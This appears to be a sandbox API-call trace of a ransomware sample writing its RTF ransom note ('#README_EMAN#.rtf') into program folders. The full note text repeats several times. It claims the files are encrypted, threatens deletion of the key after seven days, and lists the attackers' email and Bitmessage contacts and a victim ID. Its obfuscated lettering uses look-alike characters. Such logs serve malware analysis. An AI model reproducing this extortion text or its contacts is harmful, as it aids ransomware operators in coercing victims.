to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7aa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x01zççÞ\x82Os\x98¦\x11\x1bÿÁ\x1e¨©®ÃU+(\x9c3>", lpUsedDefaultChar=0x0) returned 8717 [0204.914] WriteFile (in: hFile=0x2f8, lpBuffer=0x1ef7aa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7aa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0204.914] CloseHandle (hObject=0x2f8) returned 1 [0204.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\#readme_eman#.rtf")) returned 0xffffffff [0204.915] GetLastError () returned 0x2 [0204.915] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0204.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third 